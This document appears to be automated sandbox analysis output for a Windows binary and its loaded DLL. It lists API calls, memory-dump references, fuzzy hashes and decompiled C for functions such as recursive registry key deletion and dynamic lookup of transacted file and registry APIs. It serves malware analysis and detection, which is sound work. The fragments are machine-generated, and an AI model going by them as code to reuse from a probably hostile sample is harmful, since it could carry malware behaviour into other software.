                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,00020019,00000000,00020019,00000000), ref: 6E628146
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6E628165
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(00020019,00000000,?,?,?,00000000,00020019,00000000,00020019,00000000), ref: 6E6281B4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressHandleModuleOpenProc
                                                                                                                                                    • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                                                                    • API String ID: 1337834000-3913318428
                                                                                                                                                    • Opcode ID: 45d9534e5311ccc21cf46479ea185a699e673d34e5393cc242d358ba81b78e61
                                                                                                                                                    • Instruction ID: 7255e11c0f71042fe5ff2ee132436872d1a65b0ed85c5676aad043ba0e45d659
                                                                                                                                                    • Opcode Fuzzy Hash: 45d9534e5311ccc21cf46479ea185a699e673d34e5393cc242d358ba81b78e61
                                                                                                                                                    • Instruction Fuzzy Hash: AF1119B564410AEFCB04CFD9C898FDE77B9AB4A300F108168F9159B390C7349940DFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6515A8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50libraryfileloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,?,00000000,00000000,00000014,6E651199,?,000000FF,00000000,00000000,00000004,6E62C342), ref: 6E6515BB
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 6E6515CB
                                                                                                                                                    • CreateFileW.KERNEL32(00000000,00000000,6E62C342,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000014,6E651199), ref: 6E651614
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressCreateFileHandleModuleProc
                                                                                                                                                    • String ID: CreateFileTransactedW$kernel32.dll
                                                                                                                                                    • API String ID: 2580138172-2053874626
                                                                                                                                                    • Opcode ID: cc6482461420bb65da5f3501965340d6729d96a84906c04528df710a274d7462
                                                                                                                                                    • Instruction ID: 27d66b38f9ec5be1ba72c488dd2a9f71315032f3087cd758c996a4738d942cf2
                                                                                                                                                    • Opcode Fuzzy Hash: cc6482461420bb65da5f3501965340d6729d96a84906c04528df710a274d7462
                                                                                                                                                    • Instruction Fuzzy Hash: 9A01E57618094ABFDF021FD5CC54CAB3F6AFB5A3A0704452AFA2155222CB32C875AB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64EB70, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42memorywindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,?,00000000,00000000,00000000,00000000), ref: 6E64EBA6
                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000), ref: 6E64EBC5
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64EBBC
                                                                                                                                                      • Part of subcall function 6E628FD0: _DebugHeapAllocator.LIBCPMTD ref: 6E628FDE
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64EBF0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$FormatFreeLocalMessage
                                                                                                                                                    • String ID: Unknown Windows Error
                                                                                                                                                    • API String ID: 3419676974-828601449
                                                                                                                                                    • Opcode ID: 3d4c1cdaf28c6953e782158bb0047305071c5d4949d466750d567e63dfda3002
                                                                                                                                                    • Instruction ID: 7c38b2f50d18a325a8162399eeafe34836a59f1c4a6fe529905fd5a27db300ec
                                                                                                                                                    • Opcode Fuzzy Hash: 3d4c1cdaf28c6953e782158bb0047305071c5d4949d466750d567e63dfda3002
                                                                                                                                                    • Instruction Fuzzy Hash: 27012574A40208FBEB04DFD0C955BEEBBB9AB49744F108458E6066F2C0CBB1AA40CF95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6725F6, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6E6725A8,?,?,6E672570,?,?,?), ref: 6E67260B
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E67261E
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,6E6725A8,?,?,6E672570,?,?,?), ref: 6E672641
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                    • Opcode ID: 872ae6ffdf285f1a9b44578a0287d6e8e00fe3ed5f134a67b7953f050042cdab
                                                                                                                                                    • Instruction ID: 53e4de944d3bdcbf9b8537ddaa8153f087739abe373d5e43c33903ec75198484
                                                                                                                                                    • Opcode Fuzzy Hash: 872ae6ffdf285f1a9b44578a0287d6e8e00fe3ed5f134a67b7953f050042cdab
                                                                                                                                                    • Instruction Fuzzy Hash: E3F08C30541519FBDF529BE1CC19B9E7B69EB03796F100061A806A2290CB318E40EBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E621980, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 6E621997
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6E62199E
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 6E6219B1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                    • String ID: IsWow64Process$kernel32
                                                                                                                                                    • API String ID: 4190356694-3789238822
                                                                                                                                                    • Opcode ID: 77853135042485c918723897ff6467580b9336ee27b09bb4056cac1228af952d
                                                                                                                                                    • Instruction ID: 056169686b76efe6ff77b1bfa742b87c75f2a5c88b8c26289cd3976f384ad804
                                                                                                                                                    • Opcode Fuzzy Hash: 77853135042485c918723897ff6467580b9336ee27b09bb4056cac1228af952d
                                                                                                                                                    • Instruction Fuzzy Hash: D2E09275C41208FBCF14EFF1C95DA9EBFBCAB0A302F504596E942A7341DA345A448B75
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64BF50, Relevance: 7.6, APIs: 5, Instructions: 120memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64BF7D
                                                                                                                                                      • Part of subcall function 6E64DA00: _DebugHeapAllocator.LIBCPMTD ref: 6E64DA1E
                                                                                                                                                    • MulDiv.KERNEL32(?,00000060,00000060), ref: 6E64C021
                                                                                                                                                    • MulDiv.KERNEL32(?,00000060,00000060), ref: 6E64C037
                                                                                                                                                    • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 6E64C045
                                                                                                                                                    • ScreenToClient.USER32 ref: 6E64C080
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$Affinity::operator!=ClientConcurrency::details::HardwareScreen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2055680292-0
                                                                                                                                                    • Opcode ID: 1f72c9feb2d3ad9390a515a2a1c585b91e420baa36bbe1b122fd5b3b4c84db1d
                                                                                                                                                    • Instruction ID: 82fd8592c5fedaa106e4d07ed3d0e7b19b8a88796821a30c3be53613f138c7fa
                                                                                                                                                    • Opcode Fuzzy Hash: 1f72c9feb2d3ad9390a515a2a1c585b91e420baa36bbe1b122fd5b3b4c84db1d
                                                                                                                                                    • Instruction Fuzzy Hash: 2441FD75900209EFDB04CFA5C890FEEB7B9FF49714F108659E516AB280DB35A944CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040149D, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                    			E0040149D(void* _a4, short* _a8, intOrPtr _a12) {
				void* _v8;
				short _v532;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExW(_a4, _a8, 0,  *0x47eb90 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E0040149D(_v8,  &_v532, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00406328(2);
					if(_t27 == 0) {
						if( *0x47eb90 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyW(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x47eb90, 0);
				}
				return _t18;
			}








                                                                                                                                                    0x004014bf
                                                                                                                                                    0x004014c7
                                                                                                                                                    0x004014ef
                                                                                                                                                    0x004014d9
                                                                                                                                                    0x00401529
                                                                                                                                                    0x0040152f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401531
                                                                                                                                                    0x004014ed
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004014ed
                                                                                                                                                    0x00401504
                                                                                                                                                    0x0040150c
                                                                                                                                                    0x00401513
                                                                                                                                                    0x0040153f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401547
                                                                                                                                                    0x0040154f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040154f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401522
                                                                                                                                                    0x00401536

                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1912718029-0
                                                                                                                                                    • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                    • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                    • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                    • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E67B494, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 6E67B4AC
                                                                                                                                                      • Part of subcall function 6E67391E: HeapFree.KERNEL32(00000000,00000000,?,6E67B527,?,00000000,?,?,?,6E67B54E,?,00000007,?,?,6E679B53,?), ref: 6E673934
                                                                                                                                                      • Part of subcall function 6E67391E: GetLastError.KERNEL32(?,?,6E67B527,?,00000000,?,?,?,6E67B54E,?,00000007,?,?,6E679B53,?,?), ref: 6E673946
                                                                                                                                                    • _free.LIBCMT ref: 6E67B4BE
                                                                                                                                                    • _free.LIBCMT ref: 6E67B4D0
                                                                                                                                                    • _free.LIBCMT ref: 6E67B4E2
                                                                                                                                                    • _free.LIBCMT ref: 6E67B4F4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 14db07f7a55dfee8926581fbf5e2604a2fcd15a4b87cd87c7934ba410dda2984
                                                                                                                                                    • Instruction ID: bd71349c7abf7b992c4f969b66a32a817edaac6eff45a728e444602eb969a4ce
                                                                                                                                                    • Opcode Fuzzy Hash: 14db07f7a55dfee8926581fbf5e2604a2fcd15a4b87cd87c7934ba410dda2984
                                                                                                                                                    • Instruction Fuzzy Hash: C2F01231944A46DB8F70DEDAE595C5B77EEBA027147604C05F415E764DDB30FCC08AA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040209F, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040209F(int __ecx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				void* _t24;
				struct HWND__* _t26;
				void* _t28;

				_t26 = GetDlgItem( *(_t28 - 0xc), __ecx);
				GetClientRect(_t26, _t28 - 0x50);
				_t17 = SendMessageW(_t26, 0x172, _t21, LoadImageW(_t21, E0040145C(_t24, _t21), _t21,  *(_t28 - 0x48) *  *(_t28 - 0x24),  *(_t28 - 0x44) *  *(_t28 - 0x24), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}








                                                                                                                                                    0x004020a9
                                                                                                                                                    0x004020b0
                                                                                                                                                    0x004020df
                                                                                                                                                    0x004020e7
                                                                                                                                                    0x004020ee
                                                                                                                                                    0x004020ee
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030f2

                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32 ref: 004020A3
                                                                                                                                                    • GetClientRect.USER32 ref: 004020B0
                                                                                                                                                    • LoadImageW.USER32 ref: 004020D1
                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                    • Opcode ID: fbfd7a6a6085d398f7947defe9e72fce66e027f12e5118b4d0e8a3d4981e6075
                                                                                                                                                    • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                    • Opcode Fuzzy Hash: fbfd7a6a6085d398f7947defe9e72fce66e027f12e5118b4d0e8a3d4981e6075
                                                                                                                                                    • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65BA4E, Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 37COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(6E69EA20,?,?,?,?,6E65A9E8,00000010,00000008,6E65B097,6E65B0D4,6E650A4D,6E650C09,6E626BFC,6E6289D2,?,6E6289D2), ref: 6E65BA7F
                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000000,?,?,?,?,6E65A9E8,00000010,00000008,6E65B097,6E65B0D4,6E650A4D,6E650C09,6E626BFC,6E6289D2,?,6E6289D2), ref: 6E65BA95
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6E69EA20,?,?,?,?,6E65A9E8,00000010,00000008,6E65B097,6E65B0D4,6E650A4D,6E650C09,6E626BFC,6E6289D2,?,6E6289D2), ref: 6E65BAA3
                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,?,?,?,6E65A9E8,00000010,00000008,6E65B097,6E65B0D4,6E650A4D,6E650C09,6E626BFC,6E6289D2,?,6E6289D2,6E628A38), ref: 6E65BAB0
                                                                                                                                                      • Part of subcall function 6E65B9E5: InitializeCriticalSection.KERNEL32(6E69EA20,6E65BA69,?,?,?,6E65A9E8,00000010,00000008,6E65B097,6E65B0D4,6E650A4D,6E650C09,6E626BFC,6E6289D2,?,6E6289D2), ref: 6E65B9FD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$EnterInitialize$Leave
                                                                                                                                                    • String ID: in
                                                                                                                                                    • API String ID: 713024617-2319997861
                                                                                                                                                    • Opcode ID: 2cf316a09a6c3089c24a7c8007527d797fff65d3859360fa78249cfb81beae5c
                                                                                                                                                    • Instruction ID: 4c0b6cbbaa8389dab4eebd63ab57560b3f10318590e4c8e2c27e146247868310
                                                                                                                                                    • Opcode Fuzzy Hash: 2cf316a09a6c3089c24a7c8007527d797fff65d3859360fa78249cfb81beae5c
                                                                                                                                                    • Instruction Fuzzy Hash: 2DF090B2A40616FBEB001FEACC4DB8A3BADFB47326F802412E5529A345C774C4518BB5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E63C6A0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 98COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • task.LIBCPMTD ref: 6E63C742
                                                                                                                                                      • Part of subcall function 6E6370F0: task.LIBCPMTD ref: 6E63716F
                                                                                                                                                      • Part of subcall function 6E6370F0: task.LIBCPMTD ref: 6E63717B
                                                                                                                                                      • Part of subcall function 6E6370F0: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E637190
                                                                                                                                                      • Part of subcall function 6E6370F0: task.LIBCPMTD ref: 6E6371A8
                                                                                                                                                      • Part of subcall function 6E662DFE: KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,?,?,?,8007000E), ref: 6E662E5E
                                                                                                                                                    • task.LIBCPMTD ref: 6E63C7C2
                                                                                                                                                    • task.LIBCPMTD ref: 6E63C7D1
                                                                                                                                                    Strings
                                                                                                                                                    • cannot use operator[] with a string argument with , xrefs: 6E63C774
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_errorDispatcherExceptionUser
                                                                                                                                                    • String ID: cannot use operator[] with a string argument with
                                                                                                                                                    • API String ID: 865528258-2766135566
                                                                                                                                                    • Opcode ID: 3a7fe7d7985a8824b8ba25c253b81d2a875eb67521eb98ae917f52f9dddc6a01
                                                                                                                                                    • Instruction ID: f3f74e33a02ceb747e305fd28af5a51a2d1edf2107e2b5111bdaf422389c4040
                                                                                                                                                    • Opcode Fuzzy Hash: 3a7fe7d7985a8824b8ba25c253b81d2a875eb67521eb98ae917f52f9dddc6a01
                                                                                                                                                    • Instruction Fuzzy Hash: 46410871D00218DFDB44CFE4D850AEEFBB9FF54314F208669E416AB285EB706A45CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64FC90, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91memorysynchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E64FCBD
                                                                                                                                                      • Part of subcall function 6E628FD0: _DebugHeapAllocator.LIBCPMTD ref: 6E628FDE
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6E64FD3F
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6E64FD49
                                                                                                                                                      • Part of subcall function 6E625860: _DebugHeapAllocator.LIBCPMTD ref: 6E6258B5
                                                                                                                                                      • Part of subcall function 6E64FF60: _DebugHeapAllocator.LIBCPMTD ref: 6E64FFF6
                                                                                                                                                      • Part of subcall function 6E64FF60: _DebugHeapAllocator.LIBCPMTD ref: 6E650030
                                                                                                                                                      • Part of subcall function 6E64F9B0: wsprintfW.USER32 ref: 6E64F9CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$CloseHandleObjectSingleWaitwsprintf
                                                                                                                                                    • String ID: un_
                                                                                                                                                    • API String ID: 525538401-2916186597
                                                                                                                                                    • Opcode ID: 9c510528a3cfec33fec30e025ee36388e94b3605893d0816c7bb8f067533adb2
                                                                                                                                                    • Instruction ID: b76e4160ddb1d6c36ee4d3bb55643d8a6ec806cfa75257c82d85d920673502f5
                                                                                                                                                    • Opcode Fuzzy Hash: 9c510528a3cfec33fec30e025ee36388e94b3605893d0816c7bb8f067533adb2
